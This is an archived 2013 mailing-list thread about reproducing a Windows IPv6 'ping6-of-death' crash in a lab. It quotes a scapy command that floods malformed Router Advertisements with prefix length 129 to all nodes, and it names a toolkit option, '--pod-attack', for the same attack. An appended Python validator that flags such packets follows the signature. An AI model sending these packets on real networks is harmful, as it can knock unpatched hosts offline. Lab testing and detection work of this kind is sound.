[ipv6hackers] Windows ping6-of-death

Marc Heuse mh at mh-sec.de
Wed Aug 14 13:58:13 CEST 2013


Hi Johannes,

try
  frag6 --pod-attack

(and before, if necessary, "git pull; make" ;-) )

Greets,
Marc

On 14.08.2013 13:37, Johannes Weber wrote:
> Hey,
>
> I just tried the scapy command from Pierre in my IPv6 laboratory but it has not
> crashed the Windows 7 machine (which is of course not yet patched). I saw the RA
> with Wireshark on the Windows machine, but no crash.
> I also tried the --pod-attack from Fernando, but icmp6 says "unrecognized
> option". How should I test this option correctly?
>
> Regards,
>
> Johannes
>
>
>> Pierre Emeriaud <petrus.lt at gmail.com> wrote on 14 August 2013 at 10:49:
>>
>>
>> 2013/8/14 Fernando Gont <fgont at si6networks.com>:
>>> Ironically enough, they are vulnerable to attack because they don't
>>> enforce sanity checks, and the ra6 tool of the IPv6-Toolkit cannot
>>> exploit this attack because it enforces sanity checks on the Prefix
>>> lengths given by the user. :-)
>> I tried to send the following frame with scapy. It was sent correctly
>> but unfortunately I don't have any Windows boxen to test it:
>>>>> sendp(Ether()/IPv6(dst="ff02::1")/ICMPv6ND_RA()/ICMPv6NDOptPrefixInfo(prefix="2001:db8:bad:cafe::",prefixlen=129),
>>>>> loop=1, inter=0.5)
>> The incorrect prefix length was seen on the wire, but I don't know if
>> that would be enough to exploit the vuln.
>>
>>
>> Regards,
>> Pierre.
>> _______________________________________________
>> Ipv6hackers mailing list
>> Ipv6hackers at lists.si6networks.com
>> http://lists.si6networks.com/listinfo/ipv6hackers
>>

-- 
--
Marc Heuse
Mobil: +49 177 9611560
Fax: +49 30 37309726
www.mh-sec.de

Marc Heuse - IT-Security Consulting
Winsstr. 68
10405 Berlin

Ust.-Ident.-Nr.: DE244222388
PGP: FEDD 5B50 C087 F8DF 5CB9  876F 7FDD E533 BF4F 891A
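
The sanity check discussed in the quoted messages (a Prefix Information option whose prefix length exceeds 128, as in the frame sent with prefixlen=129) can be written as a receive-side validator for monitoring or test rigs. This is an added example, not code from the thread or from any tool mentioned in it; the names `check_ra` and `build_ra` and the sample lifetimes are constructed for illustration.

```python
import ipaddress
import struct

RA_TYPE = 134          # ICMPv6 Router Advertisement
OPT_PREFIX_INFO = 3    # Prefix Information option
RA_HEADER_LEN = 16     # fixed RA fields before the options

def check_ra(icmp6: bytes) -> list:
    """Validate an RA (bytes starting at the ICMPv6 type field); return findings."""
    if len(icmp6) < RA_HEADER_LEN or icmp6[0] != RA_TYPE:
        return ["not a Router Advertisement"]
    findings = []
    off = RA_HEADER_LEN
    while off < len(icmp6):
        if off + 2 > len(icmp6):
            findings.append("truncated option header")
            break
        opt_type, opt_len = icmp6[off], icmp6[off + 1]
        if opt_len == 0:                      # length is in units of 8 bytes
            findings.append("option with length 0")
            break
        end = off + opt_len * 8
        if end > len(icmp6):
            findings.append("option runs past end of packet")
            break
        if opt_type == OPT_PREFIX_INFO:
            if opt_len != 4:
                findings.append(f"prefix option has length {opt_len}, expected 4")
            else:
                prefix_len = icmp6[off + 2]
                prefix = ipaddress.IPv6Address(icmp6[off + 16:off + 32])
                if prefix_len > 128:          # an IPv6 prefix cannot exceed 128 bits
                    findings.append(f"prefix length {prefix_len} > 128 for {prefix}")
        off = end
    return findings

def build_ra(prefix: str, prefix_len: int) -> bytes:
    """Constructed sample RA with one Prefix Information option (checksum left 0)."""
    header = struct.pack("!BBHBBHII", RA_TYPE, 0, 0, 64, 0, 1800, 0, 0)
    option = struct.pack("!BBBBIII", OPT_PREFIX_INFO, 4, prefix_len, 0xC0,
                         2592000, 604800, 0)
    return header + option + ipaddress.IPv6Address(prefix).packed

if __name__ == "__main__":
    for plen in (64, 129):
        print(plen, check_ra(build_ra("2001:db8:bad:cafe::", plen)))
```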



